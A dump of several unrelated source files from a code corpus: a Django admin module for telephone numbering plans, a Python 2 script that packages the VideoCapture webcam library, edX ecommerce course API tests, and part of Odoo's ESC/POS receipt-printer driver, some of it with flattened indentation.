        # Paths matching no rule are returned unchanged and warn nothing.
        with warnings.catch_warnings(record=True) as w:
            output = update_classpath('scrapy.unmatched.Path')
        self.assertEqual(output, 'scrapy.unmatched.Path')
        self.assertEqual(len(w), 0)
| bsd-3-clause |
night-crawler/rfnumplan | admin.py | 1 | 1304 | # -*- coding: utf-8 -*-
from django.contrib import admin
from .models import Operator, Region, NumberingPlan, NumberingPlanRange
class OperatorAdmin(admin.ModelAdmin):
    """Admin for telecom operators: id/name columns, searchable by name."""
    list_display = ('id', 'name')
    search_fields = ('name',)
admin.site.register(Operator, OperatorAdmin)
class RegionAdmin(admin.ModelAdmin):
    """Admin for regions: id/name columns, searchable by name."""
    list_display = ('id', 'name')
    search_fields = ('name',)
admin.site.register(Region, RegionAdmin)
class NumberingPlanAdmin(admin.ModelAdmin):
    """Admin for numbering plans, filterable by load status and last update."""
    list_display = (
        'id',
        'name',
        'prefix',
        'plan_uri',
        'loaded',
        'last_modified',
    )
    list_filter = ('last_modified', 'loaded')
    search_fields = ('name',)
admin.site.register(NumberingPlan, NumberingPlanAdmin)
class NumberingPlanRangeAdmin(admin.ModelAdmin):
    """Admin for number ranges; FK widgets use raw ids since the related
    tables can be large."""
    list_display = (
        'id',
        'numbering_plan',
        'prefix',
        'range_start',
        'range_end',
        'range_capacity',
        'operator',
        'region',
    )
    raw_id_fields = ('numbering_plan', 'operator', 'region')
    list_filter = ('numbering_plan__name',)
    def get_queryset(self, request):
        # select_related avoids one extra query per row for the region and
        # operator columns rendered in list_display.
        return super(NumberingPlanRangeAdmin, self).get_queryset(request).select_related('region', 'operator')
admin.site.register(NumberingPlanRange, NumberingPlanRangeAdmin)
| mit |
krintoxi/NoobSec-Toolkit | NoobSecToolkit /scripts/sshbackdoors/backdoors/shell/pupy/pupy/packages/src/VideoCapture/src/mkdist.py | 8 | 8852 | version = '0.9-2'
###############################################################################
# Release script for VideoCapture (Python 2.x). Each section below is a
# sequential build step; paths to SciTE and the Python installs are
# hard-coded for the original author's machines.
# Step 1: export syntax-highlighted HTML of the main module via SciTE.
print '- exportashtml'
import os
if os.name == 'nt':
    scite = r'C:\Programme\wscite\SciTE.exe'
else:
    scite = '/iuehome/gritsch/bin/scite'
file = 'VideoCapture.py'
src = './' + file
dest = '../html/' + file + '.html'
os.system(scite + ' -open:%s -exportashtml:%s -quit:' % (src, dest))
###############################################################################
# Step 2: post-process the exported HTML.
print '- fixhtmlfile'
import time, fixhtml
time.sleep(1) # allow SciTE to finish writing
fixhtml.fixhtmlfile(dest)
###############################################################################
# Step 3: generate pydoc HTML and move it next to the other docs.
# NOTE(review): '..\html\ ' relies on Python 2 keeping the unknown '\h'
# escape literally and on the Windows 'move' command — Windows-only.
print '- pydoc_it'
os.system(r'c:\Python22\python.exe c:\Python22\Lib\pydoc.py -w VideoCapture ')
os.system('move VideoCapture.html ..\html\ ')
os.remove('VideoCapture.pyc')
###############################################################################
# Step 4: rewrite fonts and the local file:// link in the pydoc output.
print '- fixpydochtmlfile'
import string
file = '../html/VideoCapture.html'
fp = open(file)
cont = fp.read()
fp.close()
cont = string.replace(cont, '\r\n', '\n')
cont = string.replace(cont, '''<style type="text/css"><!--
TT { font-family: lucidatypewriter, lucida console, courier }
--></style>''', '''<style type="text/css"><!--
TT { font-family: courier new }
--></style>''')
cont = string.replace(cont, 'face="helvetica, arial"', 'face="verdana"')
cont = string.replace(cont, r'<a href=".">index</a><br><a href="file:///D|/home/python/vidcap/videocapture-' + version + r'/src/videocapture.py">d:\home\python\vidcap\videocapture-' + version + r'\src\videocapture.py</a>', '<a href="../index.html">index.html</a><br><a href="VideoCapture.py.html">VideoCapture.py</a>')
fp = open(file, 'wt')
fp.write(cont)
fp.close()
###############################################################################
# Step 5: assemble the distribution zip. The pure-python files are shipped
# once per supported Python version alongside the matching compiled
# vidcap extension; docs, examples and tools are added at the end.
print '- zip_it'
import zipfile
archive = zipfile.ZipFile('../VideoCapture-' + version + '.zip', 'w', zipfile.ZIP_DEFLATED)
archive.write('../LGPL.txt', 'LGPL.txt')
archive.write('../index.html', 'index.html')
archive.write('../html/logo.jpg', 'html/logo.jpg')
archive.write('../html/PythonPowered.gif', 'html/PythonPowered.gif')
archive.write('../html/VideoCapture.py.html', 'html/VideoCapture.py.html')
archive.write('../html/VideoCapture.html', 'html/VideoCapture.html')
archive.write('mkdist.py', 'src/mkdist.py')
archive.write('fixhtml.py', 'src/fixhtml.py')
archive.write('vidcap.dsp', 'src/vidcap.dsp')
archive.write('vidcap.dsw', 'src/vidcap.dsw')
archive.write('vidcapmodule.cpp', 'src/vidcapmodule.cpp')
archive.write('VideoCapture.py', 'src/VideoCapture.py')
archive.write('helvB08.png', 'src/helvB08.png')
archive.write('helvB08.pil', 'src/helvB08.pil')
archive.write('helvetica-10.png', 'src/helvetica-10.png')
archive.write('helvetica-10.pil', 'src/helvetica-10.pil')
# Per-Python-version copies of the module and its font resources.
archive.write('VideoCapture.py', 'Python20/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python20/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python20/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python20/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python20/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python21/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python21/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python21/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python21/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python21/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python22/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python22/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python22/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python22/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python22/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python23/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python23/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python23/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python23/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python23/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python24/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python24/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python24/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python24/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python24/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python25/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python25/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python25/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python25/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python25/Lib/helvetica-10.pil')
archive.write('VideoCapture.py', 'Python26/Lib/VideoCapture.py')
archive.write('helvB08.png', 'Python26/Lib/helvB08.png')
archive.write('helvB08.pil', 'Python26/Lib/helvB08.pil')
archive.write('helvetica-10.png', 'Python26/Lib/helvetica-10.png')
archive.write('helvetica-10.pil', 'Python26/Lib/helvetica-10.pil')
# Compiled extension modules (note: Python24 ships a .dll, the rest .pyd).
archive.write('Python20/vidcap.pyd', 'Python20/DLLs/vidcap.pyd')
archive.write('Python21/vidcap.pyd', 'Python21/DLLs/vidcap.pyd')
archive.write('Python22/vidcap.pyd', 'Python22/DLLs/vidcap.pyd')
archive.write('Python23/vidcap.pyd', 'Python23/DLLs/vidcap.pyd')
archive.write('Python24/vidcap.dll', 'Python24/DLLs/vidcap.dll')
archive.write('Python25/vidcap.pyd', 'Python25/DLLs/vidcap.pyd')
archive.write('Python26/vidcap.pyd', 'Python26/DLLs/vidcap.pyd')
archive.write('../AMCAP/AMCAP.EXE', 'AMCAP/AMCAP.EXE')
archive.write('../AMCAP/AMCAP.DOC', 'AMCAP/AMCAP.DOC')
archive.write('../Examples/exa1_snapshot.py', 'Examples/exa1_snapshot.py')
archive.write('../Examples/exa2_show-possibilities.py', 'Examples/exa2_show-possibilities.py')
archive.write('../Examples/exa3_observer.py', 'Examples/exa3_observer.py')
archive.write('../Examples/displayPropertiesDev0.pyw', 'Examples/displayPropertiesDev0.pyw')
archive.write('../Examples/displayPropertiesDev1.pyw', 'Examples/displayPropertiesDev1.pyw')
archive.write('../Examples/test1.jpg', 'Examples/test1.jpg')
archive.write('../Examples/test2.jpg', 'Examples/test2.jpg')
archive.write('../Examples/test3.jpg', 'Examples/test3.jpg')
archive.write('../Examples/test4.jpg', 'Examples/test4.jpg')
archive.write('../Tools/readme.txt', 'Tools/readme.txt')
archive.write('../Tools/webcam-saver/webcam-saver.py', 'Tools/webcam-saver/webcam-saver.py')
archive.write('../Tools/webcam-saver/webcam-saver.ini', 'Tools/webcam-saver/webcam-saver.ini')
archive.write('../Tools/webcam-uploader/webcam-uploader.py', 'Tools/webcam-uploader/webcam-uploader.py')
archive.write('../Tools/webcam-uploader/webcam-uploader.ini', 'Tools/webcam-uploader/webcam-uploader.ini')
archive.write('../Tools/webcam-uploader/scpdropin.py', 'Tools/webcam-uploader/scpdropin.py')
archive.write('../Tools/webcam-uploader/template.html', 'Tools/webcam-uploader/template.html')
archive.write('../Tools/webcam-uploader/offline.jpg', 'Tools/webcam-uploader/offline.jpg')
archive.write('../Tools/webcam-uploader/offline2.jpg', 'Tools/webcam-uploader/offline2.jpg')
archive.write('../Tools/webcam-watcher/cam_form.ui', 'Tools/webcam-watcher/cam_form.ui')
archive.write('../Tools/webcam-watcher/cam_form.py', 'Tools/webcam-watcher/cam_form.py')
archive.write('../Tools/webcam-watcher/webcam-watcher.py', 'Tools/webcam-watcher/webcam-watcher.py')
archive.write('../Tools/webcam-watcher/webcam-watcher.ini', 'Tools/webcam-watcher/webcam-watcher.ini')
archive.write('../Tools/webcam-watcher/cam.png', 'Tools/webcam-watcher/cam.png')
archive.write('../Tools/webcam-watcher/cam256.ico', 'Tools/webcam-watcher/cam256.ico')
archive.write('../Tools/webcam-watcher/retrieving.png', 'Tools/webcam-watcher/retrieving.png')
archive.write('../Tools/webcam-watcher/error.png', 'Tools/webcam-watcher/error.png')
archive.write('../Tools/webcam-watcher/setup.py', 'Tools/webcam-watcher/setup.py')
archive.write('../Tools/webcam-watcher/makedist.bat', 'Tools/webcam-watcher/makedist.bat')
archive.write('../Tools/3rdParty/webcam-server/email.txt', 'Tools/3rdParty/webcam-server/email.txt')
archive.write('../Tools/3rdParty/webcam-server/webcam-server.py', 'Tools/3rdParty/webcam-server/webcam-server.py')
archive.write('../Tools/3rdParty/webcam-server/webcam-server.ini', 'Tools/3rdParty/webcam-server/webcam-server.ini')
archive.write('../Tools/3rdParty/pushserver/email.txt', 'Tools/3rdParty/pushserver/email.txt')
archive.write('../Tools/3rdParty/pushserver/server.py', 'Tools/3rdParty/pushserver/server.py')
archive.write('../Tools/3rdParty/pushserver/index.html', 'Tools/3rdParty/pushserver/index.html')
archive.write('../Tools/3rdParty/pushserver/test_push.html', 'Tools/3rdParty/pushserver/test_push.html')
archive.write('../Tools/3rdParty/pushserver/test_static.html', 'Tools/3rdParty/pushserver/test_static.html')
archive.close()
mferenca/HMS-ecommerce | ecommerce/extensions/api/v2/tests/views/test_courses.py | 1 | 8632 | from __future__ import unicode_literals
import json
import jwt
import mock
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from oscar.core.loading import get_model, get_class
from ecommerce.core.constants import ISO_8601_FORMAT
from ecommerce.core.tests import toggle_switch
from ecommerce.courses.models import Course
from ecommerce.courses.publishers import LMSPublisher
from ecommerce.extensions.api.v2.tests.views import JSON_CONTENT_TYPE, ProductSerializerMixin
from ecommerce.extensions.catalogue.tests.mixins import CourseCatalogTestMixin
from ecommerce.tests.testcases import TestCase
Product = get_model('catalogue', 'Product')
ProductClass = get_model('catalogue', 'ProductClass')
Selector = get_class('partner.strategy', 'Selector')
User = get_user_model()
class CourseViewSetTests(ProductSerializerMixin, CourseCatalogTestMixin, TestCase):
    # REST API tests for the /api/v2/courses/ endpoints: authentication,
    # list / create / retrieve / update / destroy, plus the custom
    # "publish to LMS" action.
    maxDiff = None  # always show the full diff on assertion failures
    list_path = reverse('api:v2:course-list')

    def setUp(self):
        super(CourseViewSetTests, self).setUp()
        # Requests are issued as an authenticated staff user by default;
        # individual tests log out / re-login as needed.
        self.user = self.create_user(is_staff=True)
        self.client.login(username=self.user.username, password=self.password)
        self.course = self.create_course()

    def create_course(self):
        # Shared fixture: a single course used by most tests below.
        return Course.objects.create(id='edX/DemoX/Demo_Course', name='Test Course')

    def serialize_course(self, course, include_products=False):
        """ Serializes a course to a Python dict. """
        products_url = self.get_full_url(reverse('api:v2:course-product-list',
                                                 kwargs={'parent_lookup_course_id': course.id}))
        last_edited = course.history.latest().history_date.strftime(ISO_8601_FORMAT)
        data = {
            'id': course.id,
            'name': course.name,
            'verification_deadline': course.verification_deadline,
            'type': course.type,
            'url': self.get_full_url(reverse('api:v2:course-detail', kwargs={'pk': course.id})),
            'products_url': products_url,
            'last_edited': last_edited
        }

        if include_products:
            data['products'] = [self.serialize_product(product) for product in course.products.all()]

        return data

    def test_staff_authorization(self):
        """ Verify the endpoint is not accessible to non-staff users. """
        # Anonymous requests are rejected outright (401).
        self.client.logout()
        response = self.client.get(self.list_path)
        self.assertEqual(response.status_code, 401)

        # Authenticated, but non-staff, users are forbidden (403).
        user = self.create_user()
        self.client.login(username=user.username, password=self.password)
        response = self.client.get(self.list_path)
        self.assertEqual(response.status_code, 403)

    def test_jwt_authentication(self):
        """ Verify the endpoint supports JWT authentication and user creation. """
        username = 'some-user'
        email = 'some-user@example.com'
        payload = {
            'administrator': True,
            'username': username,
            'email': email,
            'iss': settings.JWT_AUTH['JWT_ISSUERS'][0]
        }
        auth_header = "JWT {token}".format(token=jwt.encode(payload, settings.JWT_AUTH['JWT_SECRET_KEY']))

        # The user does not exist yet: authenticating via JWT should create it.
        self.assertFalse(User.objects.filter(username=username).exists())

        response = self.client.get(
            self.list_path,
            HTTP_AUTHORIZATION=auth_header
        )
        self.assertEqual(response.status_code, 200)

        # The newly-created user mirrors the JWT payload, including staff status.
        user = User.objects.latest()
        self.assertEqual(user.username, username)
        self.assertEqual(user.email, email)
        self.assertTrue(user.is_staff)

    def test_list(self):
        """ Verify the view returns a list of Courses. """
        response = self.client.get(self.list_path)
        self.assertEqual(response.status_code, 200)
        self.assertListEqual(json.loads(response.content)['results'], [self.serialize_course(self.course)])

        # If no Courses exist, the view should return an empty results list.
        Course.objects.all().delete()
        response = self.client.get(self.list_path)
        self.assertDictEqual(json.loads(response.content), {'count': 0, 'next': None, 'previous': None, 'results': []})

    def test_create(self):
        """ Verify the view can create a new Course."""
        Course.objects.all().delete()

        course_id = 'edX/DemoX/Demo_Course'
        course_name = 'Test Course'
        data = {
            'id': course_id,
            'name': course_name
        }
        response = self.client.post(self.list_path, json.dumps(data), JSON_CONTENT_TYPE)
        self.assertEqual(response.status_code, 201)

        # Verify Course exists
        course = Course.objects.get(id=course_id)
        self.assertEqual(course.name, course_name)

        # Ensure the parent and child seats were created
        self.assertEqual(course.products.count(), 1)

        # Validate the parent seat
        seat_product_class = ProductClass.objects.get(slug='seat')
        parent = course.parent_seat_product
        self.assertEqual(parent.structure, Product.PARENT)
        self.assertEqual(parent.title, 'Seat in Test Course')
        self.assertEqual(parent.get_product_class(), seat_product_class)
        self.assertEqual(parent.attr.course_key, course.id)

    def test_retrieve(self):
        """ Verify the view returns a single course. """
        # The view should return a 404 if the course does not exist.
        path = reverse('api:v2:course-detail', kwargs={'pk': 'aaa/bbb/ccc'})
        response = self.client.get(path)
        self.assertEqual(response.status_code, 404)

        path = reverse('api:v2:course-detail', kwargs={'pk': self.course.id})
        response = self.client.get(path)
        self.assertEqual(response.status_code, 200)
        self.assertDictEqual(json.loads(response.content), self.serialize_course(self.course))

        # Verify nested products can be included
        response = self.client.get(path + '?include_products=true')
        self.assertEqual(response.status_code, 200)
        self.assertDictEqual(json.loads(response.content), self.serialize_course(self.course, include_products=True))

    def test_update(self):
        """ Verify the view updates the information of existing courses. """
        course_id = self.course.id
        path = reverse('api:v2:course-detail', kwargs={'pk': course_id})
        name = 'Something awesome!'
        response = self.client.put(path, json.dumps({'id': course_id, 'name': name}), JSON_CONTENT_TYPE)
        self.assertEqual(response.status_code, 200, response.content)

        # Reload the Course
        self.course = Course.objects.get(id=course_id)
        self.assertEqual(self.course.name, name)
        self.assertDictEqual(json.loads(response.content), self.serialize_course(self.course))

    def test_destroy(self):
        """ Verify the view does NOT allow courses to be destroyed. """
        course_id = self.course.id
        path = reverse('api:v2:course-detail', kwargs={'pk': course_id})
        response = self.client.delete(path)
        # DELETE is not part of the API contract; 405 and the course survives.
        self.assertEqual(response.status_code, 405)
        self.assertTrue(Course.objects.filter(id=course_id).exists())

    def assert_publish_response(self, response, status_code, msg):
        # Helper: check both the HTTP status and the formatted status message.
        self.assertEqual(response.status_code, status_code)
        self.assertDictEqual(json.loads(response.content), {'status': msg.format(course_id=self.course.id)})

    def test_publish(self):
        """ Verify the view publishes course data to LMS. """
        course_id = self.course.id
        path = reverse('api:v2:course-publish', kwargs={'pk': course_id})

        # Method should return a 500 if the switch is inactive
        toggle_switch('publish_course_modes_to_lms', False)
        response = self.client.post(path)
        msg = 'Course [{course_id}] was not published to LMS ' \
              'because the switch [publish_course_modes_to_lms] is disabled.'
        self.assert_publish_response(response, 500, msg)

        toggle_switch('publish_course_modes_to_lms', True)

        with mock.patch.object(LMSPublisher, 'publish') as mock_publish:
            # If publish fails, return a 500
            mock_publish.return_value = False
            response = self.client.post(path)
            self.assert_publish_response(response, 500, 'An error occurred while publishing [{course_id}] to LMS.')

            # If publish succeeds, return a 200
            mock_publish.return_value = True
            response = self.client.post(path)
            self.assert_publish_response(response, 200, 'Course [{course_id}] was successfully published to LMS.')
| agpl-3.0 |
mihailignatenko/erp | addons/hw_escpos/escpos/escpos.py | 65 | 31673 | # -*- coding: utf-8 -*-
import time
import copy
import io
import base64
import math
import md5
import re
import traceback
import xml.etree.ElementTree as ET
import xml.dom.minidom as minidom
from PIL import Image
try:
import jcconv
except ImportError:
jcconv = None
try:
import qrcode
except ImportError:
qrcode = None
from constants import *
from exceptions import *
def utfstr(stuff):
    """Coerce *stuff* to a string, leaving (utf-8) strings untouched.

    Byte and unicode strings are passed through unchanged because calling
    ``str()`` on them could fail or mangle the encoding; every other value
    is converted with ``str()``.
    """
    return stuff if isinstance(stuff, basestring) else str(stuff)
class StyleStack:
    """
    The stylestack is used by the xml receipt serializer to compute the active styles along the xml
    document. Styles are just xml attributes, there is no css mechanism. But the style applied by
    the attributes are inherited by deeper nodes.
    """
    def __init__(self):
        # Stack of style dicts; deeper entries override shallower ones.
        self.stack = []
        self.defaults = { # default style values
            'align':     'left',
            'underline': 'off',
            'bold':      'off',
            'size':      'normal',
            'font' :     'a',
            'width':     48,
            'indent':    0,
            'tabwidth':  2,
            'bullet':    ' - ',
            'line-ratio':0.5,
            'color':    'black',

            'value-decimals':           2,
            'value-symbol':             '',
            'value-symbol-position':    'after',
            'value-autoint':            'off',
            'value-decimals-separator': '.',
            'value-thousands-separator':',',
            'value-width':              0,
        }

        self.types = { # attribute types, default is string and can be ommitted
            'width':    'int',
            'indent':   'int',
            'tabwidth': 'int',
            'line-ratio':       'float',
            'value-decimals':   'int',
            'value-width':      'int',
        }

        self.cmds = {
            # translation from styles to escpos commands
            # some style do not correspond to escpos command are used by
            # the serializer instead
            'align': {
                'left':     TXT_ALIGN_LT,
                'right':    TXT_ALIGN_RT,
                'center':   TXT_ALIGN_CT,
                '_order':   1,
            },
            'underline': {
                'off':      TXT_UNDERL_OFF,
                'on':       TXT_UNDERL_ON,
                'double':   TXT_UNDERL2_ON,
                # must be issued after 'size' command
                # because ESC ! resets ESC -
                '_order':   10,
            },
            'bold': {
                'off':      TXT_BOLD_OFF,
                'on':       TXT_BOLD_ON,
                # must be issued after 'size' command
                # because ESC ! resets ESC -
                '_order':   10,
            },
            'font': {
                'a':        TXT_FONT_A,
                'b':        TXT_FONT_B,
                # must be issued after 'size' command
                # because ESC ! resets ESC -
                '_order':   10,
            },
            'size': {
                'normal':           TXT_NORMAL,
                'double-height':    TXT_2HEIGHT,
                'double-width':     TXT_2WIDTH,
                'double':           TXT_DOUBLE,
                '_order':   1,
            },
            'color': {
                'black':    TXT_COLOR_BLACK,
                'red':      TXT_COLOR_RED,
                '_order':   1,
            },
        }

        # Seed the stack so get() always finds a value for every known style.
        self.push(self.defaults)

    def get(self,style):
        """ what's the value of a style at the current stack level"""
        # Walk the stack from the deepest level upward; the first level that
        # defines the style wins (inheritance from shallower levels).
        level = len(self.stack) -1
        while level >= 0:
            if style in self.stack[level]:
                return self.stack[level][style]
            else:
                level = level - 1
        return None

    def enforce_type(self, attr, val):
        """converts a value to the attribute's type"""
        # Unknown attributes default to string; note int goes through float()
        # first so "2.0" parses.
        if not attr in self.types:
            return utfstr(val)
        elif self.types[attr] == 'int':
            return int(float(val))
        elif self.types[attr] == 'float':
            return float(val)
        else:
            return utfstr(val)

    def push(self, style={}):
        """push a new level on the stack with a style dictionnary containing style:value pairs"""
        # NOTE: the mutable default is safe here because `style` is only read.
        _style = {}
        for attr in style:
            if attr in self.cmds and not style[attr] in self.cmds[attr]:
                print 'WARNING: ESC/POS PRINTING: ignoring invalid value: '+utfstr(style[attr])+' for style: '+utfstr(attr)
            else:
                _style[attr] = self.enforce_type(attr, style[attr])
        self.stack.append(_style)

    def set(self, style={}):
        """overrides style values at the current stack level"""
        _style = {}
        for attr in style:
            if attr in self.cmds and not style[attr] in self.cmds[attr]:
                print 'WARNING: ESC/POS PRINTING: ignoring invalid value: '+utfstr(style[attr])+' for style: '+utfstr(attr)
            else:
                self.stack[-1][attr] = self.enforce_type(attr, style[attr])

    def pop(self):
        """ pop a style stack level """
        # The bottom (defaults) level is never popped.
        if len(self.stack) > 1 :
            self.stack = self.stack[:-1]

    def to_escpos(self):
        """ converts the current style to an escpos command string """
        cmd = ''
        # Python 2: keys() returns a list; sort it by each style's '_order'
        # using a two-argument cmp function so e.g. 'size' is emitted before
        # 'bold'/'underline'/'font' (ESC ! resets ESC -).
        ordered_cmds = self.cmds.keys()
        ordered_cmds.sort(lambda x,y: cmp(self.cmds[x]['_order'], self.cmds[y]['_order']))
        for style in ordered_cmds:
            cmd += self.cmds[style][self.get(style)]
        return cmd
class XmlSerializer:
    """
    Converts the xml inline / block tree structure to a string,
    keeping track of newlines and spacings.
    The string is outputted asap to the provided escpos driver.
    """
    def __init__(self,escpos):
        # Driver that receives the serialized output via _raw()/text().
        self.escpos = escpos
        # Nesting of open entities; each entry is 'block' or 'inline'.
        self.stack = ['block']
        # True once text has been emitted for the current entity, meaning a
        # separator (space or newline) is needed before the next content.
        self.dirty = False

    def start_inline(self,stylestack=None):
        """ starts an inline entity with an optional style definition """
        self.stack.append('inline')
        if self.dirty:
            self.escpos._raw(' ')
        if stylestack:
            self.style(stylestack)

    def start_block(self,stylestack=None):
        """ starts a block entity with an optional style definition """
        if self.dirty:
            self.escpos._raw('\n')
            self.dirty = False
        self.stack.append('block')
        if stylestack:
            self.style(stylestack)

    def end_entity(self):
        """ ends the entity definition. (but does not cancel the active style!) """
        # Blocks are terminated by a newline (only if something was printed).
        if self.stack[-1] == 'block' and self.dirty:
            self.escpos._raw('\n')
            self.dirty = False
        if len(self.stack) > 1:
            self.stack = self.stack[:-1]

    def pre(self,text):
        """ puts a string of text in the entity keeping the whitespace intact """
        if text:
            self.escpos.text(text)
            self.dirty = True

    def text(self,text):
        """ puts text in the entity. Whitespace and newlines are stripped to single spaces. """
        if text:
            text = utfstr(text)
            text = text.strip()
            text = re.sub('\s+',' ',text)
            if text:
                self.dirty = True
                self.escpos.text(text)

    def linebreak(self):
        """ inserts a linebreak in the entity """
        self.dirty = False
        self.escpos._raw('\n')

    def style(self,stylestack):
        """ apply a style to the entity (only applies to content added after the definition) """
        self.raw(stylestack.to_escpos())

    def raw(self,raw):
        """ puts raw text or escpos command in the entity without affecting the state of the serializer """
        self.escpos._raw(raw)
class XmlLineSerializer:
    """
    Renders one xml <line> element as a single fixed-width text line made of
    a left-aligned and a right-aligned part. Nothing is sent to the printer
    directly; the finished line is fed back to the XmlSerializer as the
    content of a block entity.
    """
    def __init__(self, indent=0, tabwidth=2, width=48, ratio=0.5):
        self.tabwidth = tabwidth
        self.indent = indent
        # Usable width once the indentation has been subtracted.
        self.width = max(0, width - int(tabwidth * indent))
        self.lwidth = int(self.width * ratio)
        self.rwidth = max(0, self.width - self.lwidth)
        self.clwidth = 0   # characters already placed in the left part
        self.crwidth = 0   # characters already placed in the right part
        self.lbuffer = ''
        self.rbuffer = ''
        self.left = True   # which part receives the next text

    def _txt(self, txt):
        """Append txt to the active part, truncating once that part is full."""
        if self.left:
            if self.clwidth >= self.lwidth:
                return
            chunk = txt[:max(0, self.lwidth - self.clwidth)]
            self.lbuffer += chunk
            self.clwidth += len(chunk)
        else:
            if self.crwidth >= self.rwidth:
                return
            chunk = txt[:max(0, self.rwidth - self.crwidth)]
            self.rbuffer += chunk
            self.crwidth += len(chunk)

    def start_inline(self, stylestack=None):
        """Separate a new inline entity from earlier content with one space."""
        if (self.left and self.clwidth) or (not self.left and self.crwidth):
            self._txt(' ')

    def start_block(self, stylestack=None):
        # Blocks behave like inline entities on a single-line serializer.
        self.start_inline(stylestack)

    def end_entity(self):
        pass

    def pre(self, text):
        """Add text verbatim, whitespace preserved."""
        if text:
            self._txt(text)

    def text(self, text):
        """Add text with surrounding whitespace stripped and runs collapsed."""
        if not text:
            return
        collapsed = re.sub('\s+', ' ', utfstr(text).strip())
        if collapsed:
            self._txt(collapsed)

    def linebreak(self):
        pass

    def style(self, stylestack):
        pass

    def raw(self, raw):
        pass

    def start_right(self):
        """Switch to filling the right-aligned part of the line."""
        self.left = False

    def get_line(self):
        """Return the rendered line: indent + left part + padding + right part."""
        padding = ' ' * (self.width - self.clwidth - self.crwidth)
        return ' ' * self.indent * self.tabwidth + self.lbuffer + padding + self.rbuffer
class Escpos:
""" ESC/POS Printer object """
device = None
encoding = None
img_cache = {}
def _check_image_size(self, size):
""" Check and fix the size of the image to 32 bits """
if size % 32 == 0:
return (0, 0)
else:
image_border = 32 - (size % 32)
if (image_border % 2) == 0:
return (image_border / 2, image_border / 2)
else:
return (image_border / 2, (image_border / 2) + 1)
def _print_image(self, line, size):
""" Print formatted image """
i = 0
cont = 0
buffer = ""
self._raw(S_RASTER_N)
buffer = "%02X%02X%02X%02X" % (((size[0]/size[1])/8), 0, size[1], 0)
self._raw(buffer.decode('hex'))
buffer = ""
while i < len(line):
hex_string = int(line[i:i+8],2)
buffer += "%02X" % hex_string
i += 8
cont += 1
if cont % 4 == 0:
self._raw(buffer.decode("hex"))
buffer = ""
cont = 0
def _raw_print_image(self, line, size, output=None ):
""" Print formatted image """
i = 0
cont = 0
buffer = ""
raw = ""
def __raw(string):
if output:
output(string)
else:
self._raw(string)
raw += S_RASTER_N
buffer = "%02X%02X%02X%02X" % (((size[0]/size[1])/8), 0, size[1], 0)
raw += buffer.decode('hex')
buffer = ""
while i < len(line):
hex_string = int(line[i:i+8],2)
buffer += "%02X" % hex_string
i += 8
cont += 1
if cont % 4 == 0:
raw += buffer.decode("hex")
buffer = ""
cont = 0
return raw
def _convert_image(self, im):
""" Parse image and prepare it to a printable format """
pixels = []
pix_line = ""
im_left = ""
im_right = ""
switch = 0
img_size = [ 0, 0 ]
if im.size[0] > 512:
print "WARNING: Image is wider than 512 and could be truncated at print time "
if im.size[1] > 255:
raise ImageSizeError()
im_border = self._check_image_size(im.size[0])
for i in range(im_border[0]):
im_left += "0"
for i in range(im_border[1]):
im_right += "0"
for y in range(im.size[1]):
img_size[1] += 1
pix_line += im_left
img_size[0] += im_border[0]
for x in range(im.size[0]):
img_size[0] += 1
RGB = im.getpixel((x, y))
im_color = (RGB[0] + RGB[1] + RGB[2])
im_pattern = "1X0"
pattern_len = len(im_pattern)
switch = (switch - 1 ) * (-1)
for x in range(pattern_len):
if im_color <= (255 * 3 / pattern_len * (x+1)):
if im_pattern[x] == "X":
pix_line += "%d" % switch
else:
pix_line += im_pattern[x]
break
elif im_color > (255 * 3 / pattern_len * pattern_len) and im_color <= (255 * 3):
pix_line += im_pattern[-1]
break
pix_line += im_right
img_size[0] += im_border[1]
return (pix_line, img_size)
def image(self,path_img):
""" Open image file """
im_open = Image.open(path_img)
im = im_open.convert("RGB")
# Convert the RGB image in printable image
pix_line, img_size = self._convert_image(im)
self._print_image(pix_line, img_size)
def print_base64_image(self,img):
print 'print_b64_img'
id = md5.new(img).digest()
if id not in self.img_cache:
print 'not in cache'
img = img[img.find(',')+1:]
f = io.BytesIO('img')
f.write(base64.decodestring(img))
f.seek(0)
img_rgba = Image.open(f)
img = Image.new('RGB', img_rgba.size, (255,255,255))
channels = img_rgba.split()
if len(channels) > 1:
# use alpha channel as mask
img.paste(img_rgba, mask=channels[3])
else:
img.paste(img_rgba)
print 'convert image'
pix_line, img_size = self._convert_image(img)
print 'print image'
buffer = self._raw_print_image(pix_line, img_size)
self.img_cache[id] = buffer
print 'raw image'
self._raw(self.img_cache[id])
def qr(self,text):
""" Print QR Code for the provided string """
qr_code = qrcode.QRCode(version=4, box_size=4, border=1)
qr_code.add_data(text)
qr_code.make(fit=True)
qr_img = qr_code.make_image()
im = qr_img._img.convert("RGB")
# Convert the RGB image in printable image
self._convert_image(im)
def barcode(self, code, bc, width=255, height=2, pos='below', font='a'):
""" Print Barcode """
# Align Bar Code()
